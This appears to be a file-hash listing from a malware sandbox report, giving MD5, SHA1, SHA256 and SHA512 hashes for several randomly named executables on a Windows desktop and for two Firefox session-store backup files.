C:\Users\Admin\Desktop\IUIa.exe

MD5 f8d3f008323581ce726f50276e8b58da
SHA1 aad11ef4fe261d92ecb604f3bbea217917408064
SHA256 1c86c8f0a09195aa23b2b5d0e01c29cec599c0565f3cd4072dcadcee1742a093
SHA512 fb82f55e1ec26af3352d02b85d0b93b951f21b736409b6edc855a04601f563d0546dd82c9bc7f4f94095e335026de41e42d7de3a8b023f1540f7f584e4185788

C:\Users\Admin\Desktop\EckK.exe

MD5 2fcb8e22a8a2f5b08d49228f105330df
SHA1 70908ea1589ed10ee976f5e02ee1f6ebd3d89dc8
SHA256 34ba5aa12697c271af75a1583e4acf5d4a4ff9aa12bd114cba35fa2730d59737
SHA512 e1524752326b049b5d07809d609f0ee7ed57231444dd52979b88ca52ca02f27571057c13aa1acca40092ea3841464571791733e3623414ab1f1899ee481fc183

C:\Users\Admin\Desktop\gksW.exe

MD5 3088e3c619693df66852105ef60bb4bc
SHA1 5ef21176872518878b66e009a28347e33cfcf3c2
SHA256 8627bca62724a484cae94ed3c63d2814945098e01b20b0833ec049c61917c5f6
SHA512 22eaffb2395071e245c26d52c016d7c832572df4f4b056feb187dd3e7dd5d4454a95502f3deca58c9b306e1fa22f973ff43ed65354dcfbd08611dec09139967a

C:\Users\Admin\Desktop\WIIC.exe

MD5 d4c34293b77e9f9729be124e1f03e585
SHA1 e8bbc6bd2a166363434342f979b125a7f869542a
SHA256 61b6edb895de6d4d8c7f6d312ff5acbd8eb911098a1557779ae70d771b413d87
SHA512 a8a2d72eb5ac79f05d25a1502a30baa1e2fbe339861e5f053ea40c630e2a61c33bb947e952ad954de12098a508cab12456b11bdbbafdb9c46cc8b84b8ae7430b

C:\Users\Admin\Desktop\oMAG.exe

MD5 1d503167a794d705390122535717f50a
SHA1 d4d32c87f8b598a80c7b1597445c9ef407e0bcd8
SHA256 42cad772dcbe212fa024aa3a00cedb7325a2250baf38ab5fc35afe234fe7c631
SHA512 5d71977327d64ecdaa9de09d40d8107b1e53ff58fa4ca8f81dd8a17e95b1fc7068ae8bad2de334157c92a72b43daf700db68bd0eedba2d6b42b718b134637fd9

C:\Users\Admin\Desktop\MgAI.exe

MD5 d25b8cfe619b953e2905995b70683aa0
SHA1 674dcdf3de8a5b3a60f77bcecec78b5ff3e2271d
SHA256 9e868cdd6bea9497bd706c56cec3df6ab8373ebf1f695d169842aabf0c9378fe
SHA512 89ca6fedf690cd8da6e0105e12f2596db69b6f906f8b85e50ce619f289fdf01ff611f6aa1ac4bc9e249e5d57c6d0fa3fbea0f895f0828b8f1ac0638d25f5e065

C:\Users\Admin\Desktop\OMki.exe

MD5 9a67ec3702bc0baddde00839bcb2721e
SHA1 cb3e2bbe970c28dac8120541aaa6aa9d7d6f43f7
SHA256 2af265a8e32b133b39b573b8da2618d6d50b435314f284b5e3a59d2cd5d63a71
SHA512 d89087ada342f24f91596705b3b8bcbe0838845b80779327c17a5cbb48003536f544fc6664565a543af7fb0315f3af98d3beb16568d6dee9e8282817af2cbab7

C:\Users\Admin\Desktop\EEcG.exe

MD5 490fa249a71484ca4a77a0c74b8116a2
SHA1 d20419961b1fb42a7165ec1c16e34356989d97fb
SHA256 5756d1992277a183c1deb6758f39d4b75b617f1babe2b5e27513f1e1f8d51f5a
SHA512 567797690749d4c41921dcc64865552956a97c63dd1502ab1fb9f3e6c42682236ffc4722fea70a2c7eb059668b5b6a8cfff784ba0ec34cab647cbf151f3ca9a7

C:\Users\Admin\Desktop\IsYS.exe

MD5 6afd449641450fd2b806b123a4ed66d8
SHA1 a00348402d826051490f7291e8bd3684c1d2a720
SHA256 818fb0c8134b4ec84b076301fb06de4f60f72ee0a881147a5fd733a02a24e511
SHA512 0fcc3305f9bca4cd1d5af1a4f744015762457f016dcfaf2b41e0c864c73f70ebe331fba2526a2c32f9b4fee6868c1846f02fcc5176e6ab7320690cb5659ca994

C:\Users\Admin\Desktop\SokK.ico

MD5 d4d5866fa12a7d7aeb990ba5eae60cb1
SHA1 a1fdfc36c9500844fe0c4554fd60cc95808bb9a8
SHA256 5388384511211df8aa81844cff67add9646c8196456f34bb388c2bceecf5f2b4
SHA512 7e8537da4047e751e3613bd089014d6ba3f4418a6d8f71c2cfdde146c0ef83895e74417ef19c30a63adc1d38fe0c1f8fdee3f2eb5bb0146e5043f06c73dba06d

C:\Users\Admin\Desktop\SEIY.exe

MD5 d2223cef54689acc2f479813d3538d1e
SHA1 414105fa2f72cf2cbaf211372da1e96294979aaa
SHA256 2e0a0654bbc60636392beeb93311d874eb40d59faa0c0bb65e18b7f506a55c65
SHA512 77bf7d23846d72d184baa23d810dcb2ba23afb52c71ef72c1249efa1f60867b7b5c15141331b637e6337120b5edffbe31b9d63c0a3469f3ca77ed39916945a03

C:\Users\Admin\Desktop\MIMC.exe

MD5 26e2f78ca493ffeec5c3b08e8c03713b
SHA1 90e69b04b53b312c54b6070b6fd10c592ad30f2a
SHA256 8870b4432649023530c21ca4e10f43b4a10111c607f13328921e8db268fe5c60
SHA512 94abfdd94385947f125cf75b251d9c22a509cd7554370d8e27dbe577307a2b27c0aecb48f400af2d8536e4df42382363659c38cc421182babd87607f37aad7dc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 2d09dd2144feba0f5ca4b9edbed561f7
SHA1 400641309e2a69b61a992160116763da93bcdb0c
SHA256 451d64a3548cd19e2a21d366387056216e4f2aa55b6b21972904f206c44d0c97
SHA512 c2c742692571639532f96352a0ecc963ecd0805b764472971ff78d2f5a01f27a2eb09bc9cbddfa1587d5f3a4d793b12cd7cad58fdd98dc9cf137887e7a1d63b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 f306cf3c7d62642d436b420257de0402
SHA1 4e7c1a4a60b369e7bcd00eda87401a874466ba81
SHA256 df72a4de4c8ae913cff92809712c6879e5ec7cefe55bdda11e4712c49ff0d99a
SHA512 1eb5fe2e3790eed03726e3c8c78bdf1d606a70d32a5a5b58f48f014f31b7cc14a8297d839f389a9fa828aae06b5fd3bd968c1172a4bb4f1ecbfc78721ef72eff